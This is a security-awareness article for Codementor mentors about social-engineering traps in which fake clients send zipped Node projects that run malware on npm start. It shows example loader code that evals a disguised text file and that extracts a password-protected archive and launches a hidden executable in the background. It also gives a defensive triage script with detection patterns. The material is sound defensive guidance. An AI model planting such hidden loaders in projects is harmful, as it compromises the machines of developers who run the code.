Staying Safe on Codementor: Recognizing and Avoiding Social Engineering Traps
As a mentor on Codementor, you may encounter client requests that seem straightforward but are actually traps designed to exploit your trust and compromise your system. These malicious requests often rely on urgency and social engineering to trick mentors into running harmful code. Here’s a concise guide to help you identify and avoid these threats.
How Malicious Requests Work
A typical malicious request might look like this:
"The first person to check the site and fix the issue will be hired."
This creates a sense of urgency, pushing you to act quickly. The client provides a direct download link (e.g., Google Drive) to a zipped project and asks you to run npm start to identify errors. If you rush to execute the code, you may unknowingly run malicious scripts that compromise your system.
Red Flags to Watch For
1. Direct Download Links
Avoid downloading projects from platforms like Google Drive or Dropbox. These lack the protections of repositories like GitHub or GitLab.
2. Suspicious package.json Files
Look for:
- Unnecessary or outdated dependencies (e.g., mailgun-js, 7zip-bin).
- Missing devDependencies for tools like nodemon.
3. Obfuscated or Hidden Code
- Files with hundreds of empty lines followed by minified or obfuscated code.
- Use tools to deobfuscate and inspect such files.
4. Compressed Files
- Large zip files (e.g., 2MB for a project that should only be a few KB) are suspicious.
- Password-protected archives are a major red flag.
5. Use of eval()
Code that uses eval() to execute strings is inherently dangerous. For example:
    const fs = require('fs');

    // Whatever the text file contains is executed as JavaScript:
    // the "CSS" file is really the payload.
    fs.readFile('public/css/types.txt', 'utf8', (err, data) => {
        if (!err) eval(data);
    });
What Happens If You Run the Code?
If you execute the malicious code, it may:
- Extract a password-protected archive using tools like 7zip-bin.
- Execute a hidden binary (e.g., app.exe) that could:
  - Steal sensitive data (e.g., browser credentials, crypto wallets).
  - Run in the background, undetected, while compromising your system.
For example, the malicious script might look like this:
    const fs = require("fs");
    const { exec, spawn } = require("child_process");

    // Archive disguised as a JavaScript asset, shipped inside the project.
    const zipPath = "./public/js.7zip-F.zip";
    // Password passed on the 7-Zip command line (the -p switch): a red flag in itself.
    const password = " -pMALICIOUS_PASSWORD ";
    const unzipCommand = `"7za" x "${zipPath}" ${password} -o"./output" -y`;

    exec(unzipCommand, () => {
        const extractedFile = "./output/app.exe";
        if (fs.existsSync(extractedFile)) {
            // Detached, with no stdio: the binary keeps running after npm start exits.
            spawn(extractedFile, [], { detached: true, stdio: "ignore" }).unref();
        }
    });
How to Stay Safe
1. Inspect Everything
- Review all files, especially package.json, for unusual dependencies.
- Expand the project structure in your editor to get a sense of its complexity.
2. Avoid Direct Links
- Only accept projects hosted on trusted platforms like GitHub or GitLab.
3. Don’t Rush
- Never run npm start or any other commands without fully understanding the code.
4. Check for Obfuscation
- Search for patterns like _0x or excessive minification, which often indicate malicious intent.
5. Use a Secure Environment
- If you must test code, use a virtual machine or sandboxed environment.
6. Report Suspicious Activity
- Flag suspicious requests and report them to Codementor support.
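The red flags listed under "Red Flags to Watch For" and the "Inspect Everything" and "Check for Obfuscation" steps above can be applied mechanically before anything is run. The following is an added example, not code from the original article or from Codementor: a read-only triage of a project's file contents that reports the article's indicators. The thresholds (100 blank lines, 500-character lines) and the sample project are constructed assumptions.

```javascript
// Added example, not part of the original article: a read-only triage of a
// downloaded Node project that applies the red flags above to file contents
// before anything is executed. Every input below is a constructed sample.
const SUSPICIOUS_DEPS = ["7zip-bin", "mailgun-js"]; // the article's examples
// package.json: dependencies the article calls out, plus a start script that
// relies on nodemon without declaring it as a devDependency.
function auditPackageJson(text) {
  const pkg = JSON.parse(text);
  const findings = [];
  for (const d of Object.keys(pkg.dependencies || {})) {
    if (SUSPICIOUS_DEPS.includes(d)) findings.push(`package.json: suspicious dependency ${d}`);
  }
  const scripts = Object.values(pkg.scripts || {}).join(" ");
  if (/\bnodemon\b/.test(scripts) && !(pkg.devDependencies || {}).nodemon) {
    findings.push("package.json: scripts use nodemon but it is not a devDependency");
  }
  return findings;
}

// Source files: eval() of data, _0x-style identifiers, a long run of blank
// lines hiding a minified line, and a 7-Zip style password switch (-p...).
function auditSource(name, text) {
  const findings = [];
  if (/\beval\s*\(/.test(text)) findings.push(`${name}: eval() call`);
  if (/_0x[0-9a-f]{4,}/i.test(text)) findings.push(`${name}: _0x obfuscation pattern`);
  const lines = text.split("\n");
  let run = 0, maxRun = 0; // longest consecutive run of blank lines
  for (const l of lines) { run = l.trim() === "" ? run + 1 : 0; maxRun = Math.max(maxRun, run); }
  const longest = Math.max(...lines.map((l) => l.length));
  if (maxRun >= 100 && longest > 500) {
    findings.push(`${name}: ${maxRun} blank lines hide a ${longest}-char line`);
  }
  if (/\s-p[^\s"'`]+/.test(text)) findings.push(`${name}: archive password switch`);
  return findings;
}

// Walk a { path: contents } map (built from a read-only listing) and collect findings.
function triage(files) {
  return Object.entries(files).flatMap(([name, text]) =>
    name.endsWith("package.json") ? auditPackageJson(text)
      : /\.[cm]?js$/.test(name) ? auditSource(name, text) : []);
}
// Constructed sample project mirroring the article's description.
const SAMPLE = {
  "package.json": JSON.stringify({ scripts: { start: "nodemon server.js" },
    dependencies: { express: "^4.18.2", "7zip-bin": "^5.2.0", "mailgun-js": "^0.22.0" } }),
  "public/js/loader.js": "\n".repeat(200) + "var _0x1a2b=['x'];" + "a".repeat(600),
  "server.js": "fs.readFile('public/css/types.txt','utf8',(e,d)=>{ if(!e) eval(d); });",
};
console.log(triage(SAMPLE));
```

Any non-empty result means the project goes into a virtual machine or not at all, never straight into npm start on your workstation.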
Final Thoughts
Malicious actors often target mentors who are eager to help and earn. By staying vigilant and following these precautions, you can protect yourself and your clients from potential harm. Remember, no amount of money is worth compromising your system or reputation.
Stay safe, and happy mentoring!